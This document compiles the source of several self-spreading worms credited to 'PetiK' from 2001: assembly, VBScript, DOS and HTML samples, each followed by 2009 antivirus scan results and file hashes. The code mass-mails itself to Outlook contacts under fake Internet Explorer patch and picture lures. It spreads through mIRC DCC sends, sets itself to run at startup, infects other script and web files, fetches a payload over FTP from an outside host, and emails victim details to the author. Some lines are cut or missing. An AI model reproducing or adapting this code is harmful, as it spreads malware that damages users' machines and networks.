FILE_ATTRIBUTE_READONLY equ 00000001h

FILE_ATTRIBUTE_HIDDEN equ 00000002h
FILE_ATTRIBUTE_NORMAL equ 00000080h
CREATE_ALWAYS equ 00000002h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h
HKEY_CURRENT_USER equ 80000001h
SPI_SETDESKWALLPAPER equ 00000020
max_path equ 260

filetime struc
LowDateTime dd ?
HighDateTime dd ?
filetime ends
win32 struc
FileAttributes dd ? ; Attribut du fichier
CretionTime filetime ? ; Date de création
LastAccessTime filetime ? ; Dernier accès
LastWriteTime filetime ? ; Dernière modification
FileSizeHigh dd ? ; Taille du fichier
FileSizeLow dd ? ; La même chose qu'avant
Reserved0 dd ? ;
Reserved1 dd ? ;
FileName dd max_path(?) ; Nom du fichier long
AlternativeFileName db 13 dup(?) ; Nom du fichier court
db 3 dup(?) ;
win32 ends
CHERCHE win32 <>
inid: db "[script]",0dh,0ah
db "n2= /.dcc send $nick "
db "",0dh,0ah
db "n3=}",00h
INITAILLE equ $-inid
vbsd:
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'Set OApp=CreateObject("Outlook.Application")',0dh,0ah
db 'If OApp="Outlook" Then',0dh,0ah
db 'Set Mapi = OApp.GetNameSpace("MAPI")',0dh,0ah
db 'For Each AddList In Mapi.AddressLists',0dh,0ah
db 'If AddList.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For AddListCount = 1 To AddList.AddressEntries.Count',0dh,0ah
db 'Set AddListEntry = AddList.AddressEntries(AddListCount)',0dh,0ah
db 'Set msg = OApp.CreateItem(0)',0dh,0ah
db 'msg.To = AddListEntry.Address',0dh,0ah
db 'msg.Subject = "The last patch for Internet Explorer"',0dh,0ah
db 'm = "Date : " & date',0dh,0ah
db 'm = m & vbCrLf & "A lot of virus and worms use a bug in Internet Explorer"',0dh,0ah
db 'm = m & vbCrLf & "This patch allows you to correct this problem"',0dh,0ah
db 'm = m & vbCrLf & ""',0dh,0ah
db 'msg.Body = m',0dh,0ah
db 'msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(1),"\ie042601.exe")',0dh,0ah
db 'If msg.To <> "" Then',0dh,0ah
db 'msg.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End if',0dh,0ah
VBSTAILLE equ $-vbsd
batd:
db "@echo off",0dh,0ah
db "if exist C:\WINDOWS\EMail.vbs start C:\WINDOWS\EMail.vbs",0dh,0ah
db "if exist C:\WINDOW\EMail.vbs start C:\WINDOW\EMail.vbs",0dh,0ah
db "if exist C:\WIN\EMail.vbs start C:\WIN\EMail.vbs",0dh,0ah
db "if exist C:\WIN95\EMail.vbs start C:\WIN95\EMail.vbs",0dh,0ah
db "if exist C:\WIN98\EMail.vbs start C:\WIN98\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.000\EMail.vbs start C:\WINDOWS.000\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.001\EMail.vbs start C:\WINDOWS.001\EMail.vbs",0dh,0ah
db "start ftp -i -v -s:C:\Win.drv",00h
BATTAILLE equ $-batd
drvd:
db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "lcd C:\",0dh,0ah
db "bin",0dh,0ah
db "get petik.bmp",0dh,0ah
db "bye",0dh,0ah
db "exit",00h
DRVTAILLE equ $-drvd
.code
DEBUT:
CACHE: call GetCurrentProcessId ; Ceci permet de cacher le programme
push 01h ; dans la liste des tâches.
push eax ; (CTRL+ALT+SUPR)
call RegisterServiceProcess ;
COPIE: push 00h ; On copie ici le fichier original

push 260 ;
push eax ;
call GetModuleFileNameA ;
push 260 ;
call GetSystemDirectoryA ; dans le répertoire SYSTEM
push offset Copie ; avec le nom "ie042601.exe"
call lstrcat ;
push 00h ;
call CopyFileA ;
WIN_INI:push 260 ; Pour qu'il s'active à chaque démarrage,
push offset szWinini ;
call GetWindowsDirectoryA ; on enregistre le nom du fichier dans WIN.INI
push offset Winini ;
push offset szWinini ; dans la section [windows] à la ligne "run":
call lstrcat ;
push offset szWinini ; [windows]
push offset szCopie ; run=%SysDir%\ie042601.exe
push offset run ;
push offset windows ;
SCRIPT: push 00h ; Création du fichier C:\script.ini

push FILE_ATTRIBUTE_NORMAL ;
push CREATE_ALWAYS ;
push 00h ;
push FILE_SHARE_READ ;
push GENERIC_WRITE ;
push offset inifile ;
call CreateFileA ;
mov [FileHandle],eax ;
push 00h ;
push INITAILLE ;
push offset inid ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;
push 00h ; On copie ce fichier dans les répertoires
suivants
push offset script1 ; C:\MIRC
call CopyFileA ;
push 00h ;
push offset script2 ; et C:\MIRC32
call CopyFileA ;
call DeleteFileA ;
EMAIL: push 260 ; Création du fichier EMail.vbs dans le

répertoire
push offset szVBS ;
call GetWindowsDirectoryA ; WINDOWS par défaut en "lecture seule".
push offset vbsfile ;
push offset szVBS ;
call lstrcat ;
push 00h ;
push FILE_ATTRIBUTE_READONLY ;
push 00h ;
push offset szVBS ;
call CreateFileA ;
push 00h ;
push VBSTAILLE ;
push offset vbsd ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;
FTP: push 00h ; Création du fichier C:\Win.drv

push FILE_ATTRIBUTE_HIDDEN ; en mode "caché"
push 00h ;
push offset drvfile ;
call CreateFileA ;
push 00h ;
push DRVTAILLE ;
push offset drvd ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;
EXEC: push 260 ;

push offset szBAT ;
push offset batfile ;
push offset szBAT ;
call lstrcat ;
push 00h ; Création du fichier WSOCK32.BAT dans "WINDOWS"
push FILE_ATTRIBUTE_NORMAL ;
push 00h ;
push offset szBAT ;
call CreateFileA ;
push 00h ;
push BATTAILLE ;
push offset batd ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;
jmp CONNECT
PAUSE: push 15 * 1 * 1000 ; Attend 3 minutes,

call Sleep ; puis recommence.
CONNECT:push offset yahoo ; Vérifie si on peut se procurer

call gethostbyname ; l'adresse IP de www.yahoo.fr.
test eax,eax ; OUI => On continue.
jz PAUSE ; NON => On refait une pause.
BAT: push 01h ; Exécute le fichier

push offset batfile ;
call WinExec ;
ATTEND: push 30 * 1 * 1000 ; Fait une pause de 30 secondes.

call Sleep ; Puis continue.
BDR: push offset RegHandle ; On cherche la sous-clé "ControlPanel\Desktop"

push KEY_SET_VALUE ;
push 00h ;
push offset SOUS_CLE ;
push HKEY_CURRENT_USER ;
call RegOpenKeyExA ;
push 02h ;
push offset TWP_D ;
push offset REG_SZ ;
push 00h ;
push offset TWP_S ;
push [RegHandle] ;
push 02h ;
push offset WPS_D ;
push offset REG_SZ ;
push 00h ;
push offset WPS_S ;
push [RegHandle] ;
push 00h ; On active "C:\petik.bmp" en papier peint

push offset bmpfile ;
push 00h ;
push SPI_SETDESKWALLPAPER ;
call SystemParametersInfoA ;
push 00h ;
call RegCloseKey ;
DOSSIER:push 260 ; On va aller dans le répertoire WINDOWS.

push offset DIR ;
call GetWindowsDirectoryA ; On y est. (On peut metre GetCurrentDirectoryA
push offset DIR ; ou encore GetSystemDirectoryA)
call SetCurrentDirectoryA ; On va le charger.
FFF: push offset CHERCHE ; On utilise les infos du fichier WIN32

push offset FICHIER ; On prend l'extension que l'on veut (ici *.txt)
call FindFirstFileA ; On recherche le premier fichier
mov edi,eax ;
cmp eax,-1 ; Si il ne trouve pas => -1
je FIN ; et saute au label FIN
MODIF: push 02h ; On modifie ici l'attribut du fichier que l'on

push offset CHERCHE.FileName ; a ouvert. On va lui mettre l'attribut caché (02h)
call SetFileAttributesA ; et lecture seule (01h)
FNF: push offset CHERCHE ; On recherche les autres fichiers

push edi ;
call FindNextFileA ;
or eax,eax ; Si il n'en trouve pas, saute au label FIN
jnz MODIF ; sinon, retourne au label MODIF
FC: push offset SearchHandle ; Ferme la session Cherche
call FindClose ;
FIN: push 00h ; FIN DU PROGRAMME

call ExitProcess ;
signature db "I-WORM.PetiK",00h
end DEBUT
File PetiK.exe received on 05.16.2009 19:29:07 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8192.B
Authentium 5.1.2.4 2009.05.16 W32/Malware!456d
Avast 4.8.1335.0 2009.05.15 IRC:Generic-008
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.IMg.66DE667B
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.A
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Win32.WormPetik
eTrust-Vet 31.6.6508 2009.05.16 Win32/Buggy.8192
F-Prot 4.4.4.56 2009.05.16 W32/Malware!456d
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.C@mm
GData 19 2009.05.16 Generic.Malware.IMg.66DE667B
Microsoft 1.4602 2009.05.16 Worm:Win32/Iepatch.A@mm
NOD32 4080 2009.05.15 Win32/Petik.A
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.8192
Panda 10.0.0.14 2009.05.16 W32/IEPatch
PCTools 4.4.2.0 2009.05.16 BAT.Petik.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.p
Sophos 4.41.0 2009.05.16 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.C
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8192.B
VirusBuster 4.6.5.0 2009.05.16 BAT.Petik.A
MD5...: 61ed2fc0c60eac81856e07055621b5aa
SHA1..: f172dd91c6e866ad0dfdafd9ea8d6412cf66c42e
' Name : VBS.Study
' Author : PetiK
' Language : VBS
' Date : 15/02/2001
'VBS/Study by PetiK ©2001. 15/02/2001

'Merci à FireBurn, Melissa, Monopoly et Prolin
'Ce programme permet d'étudier la propagation des vers.
'To study the propagation of worms.
' It spread itself with 4 differents Subject, Body and Attached file.
' It send to Panda34@caramail.com the country of infected computer.

Set O = CreateObject("Outlook.application")
Set mapi = O.GetNameSpace("MAPI")
For Each AddList In mapi.AddressLists
Set msg = O.CreateItem(0)
Randomize
Num = Int((4*Rnd)+1)
If num = 1 Then
c.Copy(fso.GetSpecialFolder(0)&"\MyGirlfriend_NUDE.jpg.vbs")
msg.Subject = "Hi, how are you ?"
msg.Body = "Hi, look at this nice Pic attached !"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MyGirlfriend_NUDE.jpg.vbs")
elseif num = 2 Then

c.Copy(fso.GetSpecialFolder(0)&"\Winword.doc.vbs")
msg.Subject = "Important Message"
msg.Body = vbCrLf & "Here is that document you asked"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"Winword.doc.vbs")
elseif num = 3 Then

c.Copy(fso.GetSpecialFolder(0)&"\MONOPOLY.VBS")
msg.Subject = "Bill Gates joke"
msg.Body = "Bill Gates is guitly of monopoly. Here is the proof. :-)"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MONOPOLY.VBS")
elseif num = 4 Then

c.Copy(fso.GetSpecialFolder(0)&"\CREATIVE.exe.vbs")
msg.Subject = "A great Shockwave flash movie"
msg.Body = "Check out this new flash movie that I download just now... It's Great."
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"CREATIVE.exe.vbs")
End If
msg.Send
End If
Next
End If
Next
Set msg2 = O.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
PAYS = ws.RegRead("HKCU\Software\Microsoft\Internet
Explorer\International\AcceptLanguage")
msg2.Subject = "VBS/Study arrivant de " & PAYS
msg2.Send
File Study.vbs received on 05.11.2009 07:14:06 (CET)

AntiVir 7.9.0.166 2009.05.10 Worm/Petik.B1
Authentium 5.1.2.4 2009.05.10 VBS/Petik.G@mm
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.11 Generic.ScriptWorm.AE9B1AEA
CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.G
ClamAV 0.94.1 2009.05.11 -
DrWeb 5.0.0.12182 2009.05.11 modification of VBS.Petik
eSafe 7.0.17.0 2009.05.10 -
F-Prot 4.4.4.56 2009.05.10 VBS/Petik.G@mm
Fortinet 3.117.0.0 2009.05.10 VBS/Petik.G@mm
GData 19 2009.05.11 Generic.ScriptWorm.AE9B1AEA
K7AntiVirus 7.10.729 2009.05.08 -
McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.B1
Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.H
Norman 6.01.05 2009.05.08 VBS/GenMail.C
nProtect 2009.1.8.0 2009.05.10 VBS.Petik.H@mm
Panda 10.0.0.14 2009.05.10 VBS/Generic.worm
PCTools 4.4.2.0 2009.05.07 VBS.Petik.H
Prevx 3.0 2009.05.11 -
Rising 21.29.00.00 2009.05.11 VBS.Worm.Spam.Brief
Sophos 4.41.0 2009.05.11 VBS/Petik-I
Sunbelt 3.2.1858.2 2009.05.09 -
Symantec 1.4.4.12 2009.05.11 Trojan Horse
TheHacker 6.3.4.1.324 2009.05.09 -
VBA32 None 2009.05.11 -
VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.H
MD5...: f41a964a3cb2ad29bcee1ce95163c7a9
SHA1..: 5b003c80a78b61e702f80e83bb77cffff4678d8b
;Bastille Virus/Worm par PetiK le 23/04/2001
.model small
.code
org 100h
DEBUT:
OUVRE_AUTO:
mov ax,3D01h
lea dx,FILE
int 21h
xchg ax,bx
xor cx,cx
mov dx,cx
mov ax,4202h
int 21h
mov cx,AUTOL
lea dx,DAUTO
mov ah,40h
int 21h
mov ah,3Eh
int 21h
COPIE_VIRUS:
mov ah,3Ch
xor cx,cx
lea dx,COPIE
int 21h
xchg ax,bx
mov ah,40h
mov cx,offset VRAIFIN - offset DEBUT
lea dx,DEBUT
int 21h
mov ah,3Eh
int 21h
MIRC: mov ah,3Ch

xor cx,cx
lea dx,MIRCF1
int 21h
xchg ax,bx
mov cx,MIRCL
lea dx,DMIRC
mov ah,40h
int 21h
mov ah,3Eh
int 21h
mov ah,41h
mov dx,offset MIRCF2
int 21h
mov ah,56h
mov di,offset MIRCF2
int 21h
mov ah,41h
int 21h
DATE: mov ah,2Bh
int 21h
mov dh,7
mov dl,14
mov cx,2001
int 21h
HEURE: mov ah,2Dh

int 21h
mov cx,0A00h
xor dx,dx
int 21h
FIN: mov ah,4Ch

int 21h
FILE db 'C:\Autoexec.bat',00h
MIRCF1 db 'C:\script.ini',00h
MIRCF2 db 'C:\mirc\script.ini',00h
COPIE db 'C:\Win32.com',00h
WHO db 'Bastille Virus/Worm by PetiK (c)2001',00h
DAUTO: db '',0dh,0ah
db 'cls',0dh,0ah
db 'echo You''re infected by Bastille Virus (c)2001',0dh,0ah
db 'echo.',0dh,0ah
db 'echo Don''t panic ! It''s not dangerous, just fatal !!',0dh,0ah
db 'pause'
AUTOL equ $-DAUTO
DMIRC db '[script]',0dh,0ah
db 'n0=on 1:start:{',0dh,0ah
db 'n1= .sreq ignore',0dh,0ah
db 'n2=}',0dh,0ah
db 'n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com',0dh,0ah
db 'n4=on 1:join:#:{',0dh,0ah
db 'n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }',0dh,0ah
db 'n6=}',0dh,0ah
db 'n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com'
MIRCL equ $-DMIRC
VRAIFIN:
end DEBUT
File Bastille.com received on 05.16.2009 10:45:35 (CET)

a-squared 4.0.0.101 2009.05.16 IRC-Worm.DOS.Petik.a!IK
AhnLab-V3 5.0.0.2 2009.05.15 Worm/Pestil
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Basti.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/DOS.Petik
Authentium 5.1.2.4 2009.05.15 IRC/Mircworm.AC
Avast 4.8.1335.0 2009.05.15 Bastille-803
AVG 8.5.0.336 2009.05.15 IRC-Worm/Pestil.A
BitDefender 7.2 2009.05.16 IRC-Worm.Bastille.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.IRC.Petik.A
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 IRC.Petik
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 MIRC/Generic
F-Prot 4.4.4.56 2009.05.15 Heuristic-1
F-Secure 8.0.14470.0 2009.05.15 IRC-Worm.DOS.Petik.a
Fortinet 3.117.0.0 2009.05.16 Petik.C
GData 19 2009.05.16 IRC-Worm.Bastille.A
Ikarus T3.1.1.49.0 2009.05.16 IRC-Worm.DOS.Petik.a
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.DOS.Petik.a
McAfee 5616 2009.05.15 IRC/Pestil
McAfee+Artemis 5616 2009.05.15 IRC/Pestil
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Basti.1
Microsoft 1.4602 2009.05.16 Worm:DOS/Pestil
NOD32 4080 2009.05.15 Petik
Norman 6.01.05 2009.05.16 DOS/Virus.gen
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Petik
PCTools 4.4.2.0 2009.05.15 Bastille.A
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 DOSCOM.Virus.IRC-Worm.petik
Sophos 4.41.0 2009.05.16 Petik
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 IRC.Worm.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 IRC_PETIK.C
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 Bastille.A
MD5...: d35715e97081f71ca4df20ad03bc0341
SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de
' Name : VBS.Starmania.A
' Author : PetiK
' Date : May 09th 2001
' Size : 4566 bytes
' Action : It copies itself to %windir%\Hwinfo.vbs and to %systemroot%\Issetup.vbs.
' It adds to values. The first in the Run key and the second in the RunServices
' key. Then it infects all *.vbs and *.vbe files in differents folder :
'
' C:\WINDOWS \
' C:\WINDOWS\SYSTEM |
' C:\WINDOWS\TEMP |_
' C:\WINDOWS\SAMPLES\WSH |- All those name are by default
' C:\WINDOWS\DEKTOP |
' C:\MY DOCUMENTS /
' The virus adds his code at the start of the file.
'
' After it creates a script.ini file to C:\mirc folder. When the current day is
' 15th, the worm displays a message, changes the RegisteredOwner and Registered-
' Organization by “Starmania” and “PetiK Corpor@tion” and adds some values to
' display a message when the computer start. It changes all days the Start Page
' of Internet Explorer between five differents adresses :
'
' http://www.symantec.com
' http://www.pandasoftware.com
' http://www.avp.ch
' http://www.cia.gov
' http://www.fbi.gov
'
' At the end, it spreads with Outlook. There are three differents subject, body
' and attachments :
'
'First : Subject : New Picture for you !
' Body : Look at this nice picture attached
' Attacged : NewPic__Cool.jpg.vbs
'
'Second : Subject : LoveLetter Fix
' Body : Protect you against VBS.LoveLetter.Variant
' Attacged : LoveFix.vbs
'
'Third : Subject : How to win a holiday in Paris
' Body : Play at this game attached and win a holiday in Paris
' Attacged : Win_A_Holiday.vbs
'
#-------------------- START OF CODE --------------------#
'VBS.Starmania
'Coded by PetiK on 09/05/2001
'Made In France
Dim f,w,file
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set file=f.OpenTextFile(WScript.ScriptFullName,1)
vbsworm=file.ReadAll
START()
Sub START()
Set win=f.GetSpecialFolder(0)
Set sys=f.GetSpecialFolder(1)
Set cop=f.GetFile(WScript.ScriptFullName)
cop.Copy(win&"\Hwinfo.vbs")
cop.Copy(sys&"\Issetup.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Issetup")
w.RegWrite run,(win&"\Hwinfo.vbs")
w.RegWrite runs,(sys&"\Issetup.vbs")
MD=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell
Folders\Personal")
ptk(win)
ptk(sys)
ptk(f.GetSpecialFolder(2))
ptk(win&"\Samples\Wsh")
ptk(win&"\Desktop")
ptk(MD)
Worm ""
Mess()
Raffle()
Email()
End Sub
Function ptk(Folder)
If f.FolderExists(Folder) then
For each P in f.GetFolder(Folder).Files
ext=f.GetExtensionName(P.Name)
If ext="vbs" or ext="vbe" Then
Set VF=f.OpenTextFile(P.path, 1)
mark=VF.Read(14)
VF.Close
If mark <> "'VBS.Starmania" Then

VC=VF.ReadAll
VF.Close
VCd=vbsworm & VC
Set VF=f.OpenTextFile(P.path,2,True)
VF.Write VCd
VF.Close
End If
End If
Next
End If
End Function
Function Worm(Path)
If Path = "" Then
prgfl=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If f.FileExists("C:\mirc\mirc.ini") Then Path = "C:\mirc"
If f.FileExists(prgfl & "\mirc\mirc.ini") Then Path = prgfl & "\mirc"
If f.FileExists("C:\mirc32\mirc.ini") Then Path = "C:\mirc32"
If f.FileExists(prgfl & "\mirc32\mirc.ini") Then Path = prgfl & "\mirc32"
End If
If Path <> "" Then
Set mirc=f.CreateTextFile(Path & "\script.ini", True)
mirc.WriteLine "[script]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } "
mirc.WriteLine "n1= /dcc send $nick " & f.GetSpecialFolder(0) &"\Hwinfo.vbs"
mirc.WriteLine "n2=}"
End If
End Function
Sub Mess()
If Day(Now) = 15 Then
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StarMania","rundll32
mouse,disable"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","How
are you today ? For my part, I'm fine"
w.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","VBS.Starman
ia"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Starmania"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization","PetiK
Corpor@tion"
MsgBox "Hi man, it's my new Worm/Virus. It was coded by PetiK in 2001", vbinformation,
"VBS.Starmania"
End If
End Sub
Sub Raffle()
Randomize
lot=Int((5*Rnd)+1)
If lot = 1 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.symantec.com"
elseif lot = 2 Then
Page","http://www.pandasoftware.com"
elseif lot = 3 Then
Page","http://www.avp.ch"
elseif lot = 4 Then
Page","http://www.cia.gov"
elseif lot = 5 Then
Page","http://www.fbi.gov"
End If
End Sub
Sub Email()
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
Randomize
num=Int((3*Rnd)+1)
Set c = f.GetFile(WScript.ScriptFullName)
If num = 1 then
c.Copy(fso.GetSpecialFolder(0)&"\NewPic__Cool.jpg.vbs")
go.Subject = "New Picture for you !"
go.Body = "Look at this nice picture attached"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"NewPic__Cool.jpg.vbs")
elseif num = 2 then

c.Copy(fso.GetSpecialFolder(0)&"\LoveFix.vbs")
go.Subject = "LoveLetter Fix"
go.Body = "Protect you against VBS.LoveLetter.Variant"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"LoveFix.vbs")
elseif num = 3 then

c.Copy(fso.GetSpecialFolder(0)&"\Win_A_Holiday.vbs")
go.Subject = "How to win a holiday in Paris"
go.Body = "Play at this game attached and win a holiday in Paris"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Win_A_Holiday.vbs")
End If
If go.To <> "" Then
go.Send
End If
Next
End If
Next
End Sub
#-------------------- END OF CODE --------------------#End Sub
File Starmania.vbs received on 05.16.2009 19:40:56 (CET)

a-squared 4.0.0.101 2009.05.16 IRC-Worm.VBS.Generic!IK
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 VBS/Starmania.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.Generic
Authentium 5.1.2.4 2009.05.16 VBS/StarMania.A@m
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.E9844292
CAT-QuickHeal 10.00 2009.05.15 VBS/StarMania.A
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 IRC-Worm.VBS.Generic
DrWeb 5.0.0.12182 2009.05.16 modification of VBS.Merlin
eSafe 7.0.17.0 2009.05.14 VBS.Petick.
F-Prot 4.4.4.56 2009.05.16 VBS/StarMania.A@m
F-Secure 8.0.14470.0 2009.05.15 IRC-Worm.VBS.Generic
Fortinet 3.117.0.0 2009.05.16 VBS/StarMania.A@mm
GData 19 2009.05.16 Generic.ScriptWorm.E9844292
Ikarus T3.1.1.49.0 2009.05.16 IRC-Worm.VBS.Generic
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.VBS.Generic
McAfee 5616 2009.05.15 VBS/Chism
McAfee+Artemis 5616 2009.05.15 VBS/Chism
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Starmania.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Lofix
Norman 6.01.05 2009.05.16 mIRC/Gen_VBS
nProtect 2009.1.8.0 2009.05.16 VBS.Holiday.A@mm
Panda 10.0.0.14 2009.05.16 VBS/Starmania
PCTools 4.4.2.0 2009.05.16 VBS.Starma.A
Prevx 3.0 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Starmania
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.ManiaStar.A@mm
TheHacker 6.3.4.1.326 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 IRC-Worm.VBS.Generic
ViRobot 2009.5.15.1737 2009.05.15 -
MD5...: db45536af4e9a1debccb73111fce3f3f
SHA1..: d8dfd047f7ccfba137bd3932c6495d7c0fc88d2e
<--
Name : HTML.Bother
Author : PetiK
Language : HTML/VBS
' It creates on the desktop a file "Hello.txt" with this message :

"HTML.Bother by PetiK (06/05/2001)"
"A HTML.Worm made in France"
' Creates %SYSDIR%\PetiK.htm
' It infects HTM and HTML files into Personal directory and %WINDIR%\WEB
-->
<bother>
<html><head><title>Patch for Internet Explorer</title></head>
<body bgColor=#ffffff>
<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see
this page.
<br>Please open this page again and click accept ActiveX.<br>Internet Explorer</font>
<SCRIPT Language=VBScript>
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
bureau=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Desktop")
Set txt=fso.CreateTextFile(bureau&"\Hello.txt")
txt.WriteLine "HTML.Bother by PetiK (06/05/2001)"
txt.WriteLine "A HTML.Worm made in France"
txt.Close
start=ws.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start

Page")
If start <> fso.GetSpecialFolder(1)&"\PetiK.htm" Then
Set htm=fso.CreateTextFile(fso.GetSpecialFolder(1)&"\PetiK.htm",2)
htm.WriteLine ("<html><head><title>HTML.Bother</title>")
htm.WriteLine ("<body><IFRAME SRC='"+start+"'></IFRAME>")
htm.WriteLine ("<font face='verdana' color=blue size='2'>")
htm.WriteLine ("<br><br>Hi, you have my Worm.")
htm.WriteLine ("<br>It's not dangerous.")
htm.WriteLine ("<br>Contact Symantec Corporation (www.symantec.com/avcenter) to disinfect
your computer")
htm.WriteLine ("</body></html>")
htm.Close
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page",fso.GetSpecialFolder(1)&"\PetiK.htm"
End If
p = Int(Rnd * 30) + 1
If Day(Now()) = p Then
WshShell.RegWrite
"HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\",fso.GetSpecialFolder(1)&"\SHELL32.dll,69"
End If
doc=ws.RegRead
Folders\Personal")
Set FolderObj = FSO.GetFolder(doc)
Set FO = FolderObj.Files
For each cible in FO
ExtName = lcase(FSO.GetExtensionName(cible.Name))
if ExtName = "htm" or ExtName = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, False)
if vrai.readline <> "<bother>" Then
vrai.close()
htmorg = vrai.ReadAll()
vrai.close()
Set virus = document.body.createTextRange
Set vrai = fso.CreateTextFile(cible.path, True, False)
vrai.WriteLine "<bother>"
vrai.Write(htmorg)
vrai.WriteLine "<bother par PetiK May 9th 2001>"
vrai.WriteLine virus.htmltext
vrai.Close()
else
Real.close()
end if
end if
next
Set FolderObj = FSO.GetFolder(fso.GetSpecialFolder(0)&"\WEB")

